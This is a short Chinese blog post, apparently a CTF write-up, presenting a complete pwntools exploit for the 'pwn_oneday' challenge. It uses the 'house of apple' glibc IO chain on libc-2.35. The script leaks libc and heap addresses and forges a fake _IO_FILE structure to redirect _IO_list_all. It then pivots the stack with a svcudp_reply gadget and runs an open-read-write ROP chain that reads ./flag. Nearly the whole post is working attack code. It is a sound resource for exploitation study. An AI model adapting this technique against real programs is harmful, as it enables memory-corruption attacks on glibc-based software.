house of apple

roderick师傅分享的house of apple是一条很好用的IO调用链,详见:https://bbs.pediy.com/thread-273832.htm

忙里偷闲,拿house of apple调用链做了一下roderick师傅给的例题pwn_oneday,原题给的是libc-2.34,我这里是拿libc-2.35打的,也验证了该调用链仍适用于最新版的glibc,且可以近乎代替之前的IO调用链。

from pwn import *
context(os = "linux", arch = "amd64", log_level = 'debug')

io = process("./pwn")
libc = ELF("./libc-2.35.so")

def add(choice):
	io.sendlineafter("enter your command: \n", b'1')
	io.sendlineafter("choise: ", str(choice))

def delete(num):
	io.sendlineafter("enter your command: \n", b'2')
	io.sendlineafter("Index: \n", str(num))

def edit(num, data):
	io.sendlineafter("enter your command: \n", b'3')
	io.sendlineafter("Index: ", str(num))
	io.sendafter("Message: \n", data)

def show(num):
	io.sendlineafter("enter your command: \n", b'4')
	io.sendlineafter("Index: ", str(num))

if __name__ == '__main__':
	io.sendlineafter("enter your key >>\n", str(8))
	
	add(2) # 0
	add(1) # 1
	add(1) # 2
	add(1) # 3
	delete(0)
	delete(2)
	
	show(0)
	io.recvuntil("Message: \n")
	libc.address = u64(io.recv(6).ljust(8, b'\x00')) - 96 - libc.sym['_IO_wide_data_0'] - 0x100
	success("libc_address:\t" + hex(libc.address))
	io.recv(2)
	heap_base = u64(io.recv(6).ljust(8, b'\x00')) - 0x13c0
	success("heap_base:\t" + hex(heap_base))
	
	add(1) # 4
	delete(2)
	
	pop_rdi_ret = libc.address + 0x2da82
	pop_rsi_ret = libc.address + 0x37bca
	pop_rdx_r12_ret = libc.address + 0x1071f1
	
	magic_gadget = libc.sym['svcudp_reply'] + 26
	'''
	mov    rbp,QWORD PTR [rdi+0x48]
	mov    rax,QWORD PTR [rbp+0x18]
	lea    r13,[rbp+0x10]
	mov    DWORD PTR [rbp+0x10],0x0
	mov    rdi,r13
	call   QWORD PTR [rax+0x28]
	'''
	leave_ret = libc.address + 0x52db2
	fake_IO_addr = heap_base + 0x290
	rop_address = fake_IO_addr + 0xe0 + 0xe8 + 0x70
	
	orw_rop =  b'./flag\x00\x00'
	orw_rop += p64(pop_rdx_r12_ret) + p64(0) + p64(fake_IO_addr - 0x10)
	orw_rop += p64(pop_rdi_ret) + p64(rop_address)
	orw_rop += p64(pop_rsi_ret) + p64(0)
	orw_rop += p64(libc.sym['open'])
	orw_rop += p64(pop_rdi_ret) + p64(3)
	orw_rop += p64(pop_rsi_ret) + p64(rop_address + 0x100)
	orw_rop += p64(pop_rdx_r12_ret) + p64(0x50) + p64(0)
	orw_rop += p64(libc.sym['read'])
	orw_rop += p64(pop_rdi_ret) + p64(1)
	orw_rop += p64(pop_rsi_ret) + p64(rop_address + 0x100)
	orw_rop += p64(pop_rdx_r12_ret) + p64(0x50) + p64(0)
	orw_rop += p64(libc.sym['write'])
    
	payload = p64(0) + p64(leave_ret) + p64(0) + p64(libc.sym['_IO_list_all'] - 0x20)
	payload = payload.ljust(0x38, b'\x00') + p64(rop_address)
	payload = payload.ljust(0x90, b'\x00') + p64(fake_IO_addr + 0xe0)
	payload = payload.ljust(0xc8, b'\x00') + p64(libc.sym['_IO_wfile_jumps'])
	payload = payload.ljust(0xd0 + 0xe0, b'\x00') + p64(fake_IO_addr + 0xe0 + 0xe8)
	payload = payload.ljust(0xd0 + 0xe8 + 0x68, b'\x00') + p64(magic_gadget)
	payload += orw_rop
	edit(0, payload.ljust(0x880, b'\x00'))
	add(3) # 5
	add(1) # 6
	io.sendlineafter("enter your command: \n", b'5')
	io.interactive()
posted @ 2022-07-29 01:19  winmt  阅读(476)  评论(1编辑  收藏  举报